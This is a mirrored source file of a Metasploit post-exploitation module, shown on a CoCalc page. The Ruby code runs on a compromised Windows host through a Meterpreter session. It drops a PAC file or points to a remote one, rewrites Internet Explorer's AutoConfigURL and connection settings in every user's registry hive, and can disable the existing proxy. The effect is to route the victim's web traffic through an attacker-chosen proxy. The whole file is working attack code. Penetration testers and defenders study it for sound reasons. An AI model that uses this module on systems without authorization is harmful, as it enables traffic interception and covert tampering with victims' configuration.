Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/manage/ie_proxypac.rb
19670 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Post
7
include Msf::Post::Windows::Priv
8
include Msf::Post::File
9
include Msf::Post::Windows::Registry
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Windows Manage Proxy PAC File',
16
'Description' => %q{
17
This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC
18
option, a PAC file will be created on the victim host. It's also possible to provide a
19
remote PAC file (REMOTE_PAC option) by providing the full URL.
20
},
21
'License' => MSF_LICENSE,
22
'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
23
'References' => [
24
[ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],
25
[ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]
26
],
27
'Platform' => 'win',
28
'SessionTypes' => [ 'meterpreter' ],
29
'Compat' => {
30
'Meterpreter' => {
31
'Commands' => %w[
32
stdapi_sys_config_getenv
33
]
34
}
35
},
36
'Notes' => {
37
'Stability' => [SERVICE_RESOURCE_LOSS],
38
'SideEffects' => [CONFIG_CHANGES],
39
'Reliability' => []
40
}
41
)
42
)
43
44
register_options(
45
[
46
OptPath.new('LOCAL_PAC', [false, 'Local PAC file.' ]),
47
OptString.new('REMOTE_PAC', [false, 'Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)' ]),
48
OptBool.new('DISABLE_PROXY', [true, 'Disable the proxy server.', false]),
49
OptBool.new('AUTO_DETECT', [true, 'Automatically detect settings.', false])
50
]
51
)
52
end
53
54
def run
55
if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?
56
fail_with(Failure::BadConfig, 'You must set a remote or local PAC file. Aborting...')
57
end
58
59
if datastore['REMOTE_PAC']
60
@remote = true
61
print_status('Setting automatic configuration script from a remote PAC file ...')
62
res = enable_proxypac(datastore['REMOTE_PAC'])
63
else
64
@remote = false
65
print_status('Setting automatic configuration script from local PAC file ...')
66
pac_file = create_pac(datastore['LOCAL_PAC'])
67
unless pac_file
68
print_error('There were problems creating the PAC proxy file. Aborting...')
69
return
70
end
71
res = enable_proxypac(pac_file)
72
end
73
unless res
74
print_error('Error while setting an automatic configuration script. Aborting...')
75
return
76
end
77
78
print_good('Automatic configuration script configured...')
79
80
if datastore['AUTO_DETECT']
81
print_status('Enabling Automatically Detect Settings...')
82
unless auto_detect_on
83
print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...')
84
end
85
end
86
87
if datastore['DISABLE_PROXY']
88
print_status('Disabling the Proxy Server...')
89
unless disable_proxy
90
print_error('Failed to disable Proxy Server. Proceeding anyway...')
91
end
92
end
93
end
94
95
def create_pac(local_pac)
96
pac_file = session.sys.config.getenv('APPDATA') << '\\' << "#{Rex::Text.rand_text_alpha(6..13)}.pac"
97
98
unless ::File.exist?(local_pac)
99
print_error('Local PAC file not found.')
100
return false
101
end
102
103
conf_pac = ::File.open(local_pac, 'rb').read
104
105
return false unless write_file(pac_file, conf_pac)
106
107
print_status("PAC proxy configuration file written to #{pac_file}")
108
return pac_file
109
end
110
111
def enable_proxypac(pac)
112
proxy_pac_enabled = false
113
114
registry_enumkeys('HKU').each do |k|
115
next unless k.include?('S-1-5-21')
116
next if k.include?('_Classes')
117
118
key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"
119
value_auto = 'AutoConfigURL'
120
file = @remote ? pac.to_s : "file://#{pac}"
121
122
begin
123
res = registry_setvaldata(key, value_auto, file, 'REG_SZ')
124
rescue ::RuntimeError, Rex::TimeoutError
125
next
126
end
127
128
if res.nil? # Rex::Post::Meterpreter::RequestError
129
next
130
end
131
132
if change_connection(16, '05', key + '\\Connections')
133
proxy_pac_enabled = true
134
end
135
end
136
137
proxy_pac_enabled
138
end
139
140
def auto_detect_on
141
auto_detect_enabled = false
142
143
registry_enumkeys('HKU').each do |k|
144
next unless k.include? 'S-1-5-21'
145
next if k.include? '_Classes'
146
147
key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings\\Connections"
148
if change_connection(16, '0D', key)
149
print_good('Automatically Detect Settings on.')
150
auto_detect_enabled = true
151
end
152
end
153
154
auto_detect_enabled
155
end
156
157
def disable_proxy
158
value_enable = 'ProxyEnable'
159
profile = false
160
161
registry_enumkeys('HKU').each do |k|
162
next unless k.include?('S-1-5-21')
163
next if k.include?('_Classes')
164
165
key = "HKEY_USERS\\#{k}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet\ Settings"
166
begin
167
registry_setvaldata(key, value_enable, 0, 'REG_DWORD')
168
profile = true
169
rescue ::RuntimeError, Rex::TimeoutError
170
next
171
end
172
end
173
174
if profile
175
print_good('Proxy disabled.')
176
return true
177
end
178
179
return false
180
end
181
182
def change_connection(offset, value, key)
183
value_default = 'DefaultConnectionSettings'
184
begin
185
value_con = registry_getvaldata(key, value_default)
186
binary_data = value_con.unpack('H*')[0]
187
binary_data[offset, 2] = value
188
registry_setvaldata(key, value_default, ['%x' % binary_data.to_i(16)].pack('H*'), 'REG_BINARY')
189
rescue ::RuntimeError, Rex::TimeoutError
190
return false
191
end
192
193
return true
194
end
195
end
196
197